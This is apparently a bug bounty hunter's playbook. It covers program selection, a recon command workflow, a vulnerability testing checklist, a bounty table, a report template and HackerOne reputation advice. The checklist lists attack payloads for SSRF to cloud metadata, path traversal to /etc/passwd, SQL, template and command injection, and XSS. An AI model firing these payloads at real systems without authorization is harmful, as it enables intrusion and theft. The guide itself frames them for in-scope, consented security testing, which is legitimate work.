01 · Program Selection Strategy
Green flags — hunt here
- Program launched < 6 months ago (fresh, less hunters)
- Wide scope: *.company.com instead of specific subdomains
- Mobile apps, APIs, and admin panels in scope
- Response time < 7 days median (active triagers)
- Bounty table shown publicly — means they actually pay
- Private program invite — less competition, higher payouts
- Company is mid-size SaaS (50–500 employees) — more attack surface
- Low number of public resolved reports (< 50)
Red flags — avoid at start
- Scope limited to 1 or 2 specific URLs only
- Reward is "Hall of Fame only" — no cash
- Google, Facebook, Microsoft, Apple — saturated
- Response time > 30 days (slow or dead team)
- Many "Duplicate" or "Informative" closed reports visible
- Scope excludes IDOR, rate limiting, account enum
- Report template asks for extreme PoC complexity
- No bounty table — or "rewards at our discretion"
Program scoring — decide in 5 min
Score > 7/10 on the criteria above → hunt it. Under 5 → skip unless it's private and you were invited.
02 · Recon Workflow
①Read scope
②Subdomain enum
③Port & HTTP probe
④Screenshot all
⑤JS & API harvest
⑥Manual triage
Subdomain enumeration
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com >> subs.txt
assetfinder target.com >> subs.txt
sort -u subs.txt -o subs_unique.txt
# Check cert transparency
curl https://crt.sh/?q=%25.target.com&output=json
HTTP probing & screenshots
httpx -l subs_unique.txt -o live.txt \
-status-code -title -tech-detect
eyewitness --web -f live.txt -d screens/
# Nuclei scan (CVEs + misconfigs)
nuclei -l live.txt -t ~/nuclei-templates/ \
-severity medium,high,critical
JS & endpoint harvest
# Extract endpoints from JS files
gau target.com | grep ".js" | sort -u > js.txt
cat js.txt | xargs -I{} python3 linkfinder.py \
-i {} -o cli >> endpoints.txt
# Find hidden params
arjun -u https://target.com/api/user \
-oJ params.json
OSINT & forgotten assets
# Shodan — open ports, banners
shodan search "org:TargetCorp" --fields ip_str,port
# Wayback — old endpoints
waybackurls target.com | grep "=" | sort -u
# Google dorks
site:target.com ext:php OR ext:json
site:target.com inurl:api OR admin OR v1
03 · Vulnerability Testing Checklist
Authentication & Session
- JWT: alg=none, weak secret, kid injection
- OAuth: state param missing, redirect_uri bypass
- MFA bypass: skip step, brute OTP, response manip
- Password reset: token in referer, weak token, reuse
- Session: fixation, no invalidation on logout
- Account enum: timing diff on login errors
- Default creds: admin/admin, admin/password
IDOR / Access Control
- Change numeric IDs:
?id=1337→?id=1338 - Change UUIDs to another user's UUID
- Horizontal: same role, diff user's data
- Vertical: low role accessing admin endpoints
- Check API endpoints without auth header
- Mass assignment: add
role=adminto PUT body - IDOR in file downloads / exports / reports
XSS
- Reflected: URL params, error messages, search
- Stored: comments, profiles, notifications
- DOM-based:
document.write,innerHTMLin JS - CSP bypass: check header for
unsafe-inline - Attribute injection:
" onmouseover=alert(1) - SVG/File upload:
<svg onload=alert(1)> - Blind XSS: use XSSHunter callback
SSRF
- Params to check:
url=,src=,href=,fetch= - Internal:
http://localhost/admin,127.0.0.1 - Cloud metadata:
http://169.254.169.254/latest/meta-data/ - DNS rebinding, IPv6:
[::1],[::ffff:127.0.0.1] - Blind SSRF: Burp Collaborator or interactsh
- URL parsers bypass:
http://evil.com@target.com - File:
file:///etc/passwd(if not filtered)
Injection
- SQLi:
',1'OR'1'='1, sqlmap--risk=1 - SSTI:
,${7*7},<%=7*7%> - Command injection:
;id,`id`,|id - XXE: replace JSON with XML in Content-Type
- NoSQLi:
{"$gt":""}in login fields - LDAP injection:
*)(uid=*))(|(uid=* - Path traversal:
../../../etc/passwd
Business Logic
- Negative price / quantity (cart manipulation)
- Apply coupon multiple times
- Race condition on transfers / purchases
- Skip steps in multi-step flows (go direct to step 3)
- Free trial bypass / subscription downgrade abuse
- Privilege escalation via invite token reuse
- TOCTOU: check-then-use timing flaws
04 · Impact Classification & Bounty Range
| Severity | Vulnerability type | Impact statement | H1 range (avg) |
|---|---|---|---|
| CRITICAL | RCE, Auth bypass all users, SQLi with data exfil, SSRF→internal | Full system compromise or mass data breach | $5k – $50k+ |
| HIGH | Stored XSS on admin, IDOR cross-account PII, SSRF blind, Priv esc | Significant data exposure or account takeover | $1k – $8k |
| MEDIUM | Reflected XSS, CSRF on sensitive actions, Info disclosure API | Limited data exposure or partial account control | $200 – $1k |
| LOW | Open redirect, missing headers, clickjacking, verbose errors | Minimal direct impact, assists other attacks | $50 – $300 |
Chain vulns to escalate severity: Open Redirect (Low) + SSRF (Medium) + exposed AWS creds (Critical) = one Critical report worth $10k+. Always ask "what can I do with this?"
05 · Report Template
Required fields
TITLE
[VulnType] on [endpoint] allows [impact]
e.g. IDOR on /api/users/{id} allows reading any user's PII
e.g. IDOR on /api/users/{id} allows reading any user's PII
IMPACT
Start with: "This vulnerability allows an attacker to…"
Be concrete — mention PII, sessions, data affected.
Be concrete — mention PII, sessions, data affected.
STEPS TO REPRODUCE
1. Log in as User A
2. Go to /api/profile/1337
3. Change id to 1338
4. Observe User B's data returned
[attach screenshot or screen recording]
2. Go to /api/profile/1337
3. Change id to 1338
4. Observe User B's data returned
[attach screenshot or screen recording]
REMEDIATION
Validate that the authenticated user's ID matches the requested resource ID server-side. Do not rely on client-supplied IDs.
Quality checklist before submit
- Title: 1 line, vulntype + endpoint + impact
- PoC: Video or screenshots — mandatory for XSS/IDOR
- curl command included if API-based vuln
- Tested on your own test account — never prod data
- Severity selected correctly (CVSS justified)
- No real PII of other users in screenshots
- Remediation suggestion included
- Re-read the scope page — confirm it's in scope
- Proofread for typos — professionalism matters
- Burp request/response included as text, not image
After submit: Be patient, reply fast when triager responds, never be aggressive about bounty amount. Reputation compounds.
06 · HackerOne Reputation Strategy
Rep points system
- Resolved: +7 pts (base)
- Severity bonus: critical = ×5, high = ×3
- Informative: 0 pts (wasted time)
- Duplicate: 0 or −1 (report fast to avoid)
- Not applicable: −1 (understand scope well)
- Target: 100 rep → private invites start
- Target: 500 rep → elite programs open
Getting private invites
- 5+ resolved reports on public programs
- Low "noise" ratio (few informative/N/A)
- Keep signal ratio above 70%
- Specialise in one vuln class — H1 notices
- Fill your profile fully (bio, skills, socials)
- Participate in H1 live hacking events
- Write public disclosures when allowed
Avoid rep killers
- Never submit out-of-scope findings
- Never test other users' accounts without consent
- Don't spam low quality informative reports
- Don't submit theoretical only vulns without PoC
- Don't ask "what's my bounty?" before triage
- Read existing Hacktivity before submitting
- Don't disclose publicly before the fix
07 · Essential Tools Quick Reference
Recon tools
subfinder # Passive subdomain discovery
amass # Active + passive DNS enum
httpx # HTTP probe, tech detect
nuclei # Template-based vuln scan
gau # Get all URLs (wayback+)
waybackurls # Wayback Machine URLs
arjun # HTTP parameter discovery
linkfinder # JS endpoint extraction
eyewitness # Web screenshot tool
ffuf # Fast web fuzzer
Testing tools
burpsuite # Intercept, repeat, scan
sqlmap # Automated SQLi
dalfox # XSS scanner (fast)
jwt_tool # JWT attack tool
interactsh # OOB callback (SSRF/blind)
xsshunter # Blind XSS tracker
corsy # CORS misconfiguration
ssrfmap # SSRF scanner
nomore403 # 403 bypass techniques
crlfuzz # CRLF injection scanner
08 · J0$tif Field Notes
Your AD/infra advantage: When a program has VPN portals, cloud assets, or internal-facing apps in scope — go there. 95% of hunters skip it. One SSRF to internal or exposed admin panel = critical.
JS is underrated: Most hunters skip JS analysis. Find endpoints in JS files that are not in the docs — they're often unprotected APIs with zero authentication.
Speed beats perfection: Submit a medium-quality IDOR fast rather than perfect-report a critical slow. Duplicates kill rep. Use a simple PoC first, elaborate after.
Never test on production data: Create your own test accounts. If you accidentally hit real user data, stop and report it anyway — honesty builds reputation.
Business logic > automation: Nuclei finds what everyone finds. Business logic flaws (coupon stacking, race conditions, flow skipping) are found only by humans who understand the app. Spend 30 min reading what the app is supposed to do.
Burp history is your memory: Never clear Burp history during a session. Hidden endpoints appear in background requests you didn't trigger intentionally — watch the HTTP history while using the app normally.
API versions: If
/api/v2/user has auth, try /api/v1/user. Old versions are often left exposed without proper access control.Mobile apps: Decompile APK with jadx, intercept with Burp + Android emulator. Mobile API endpoints are often less tested and lack rate limiting.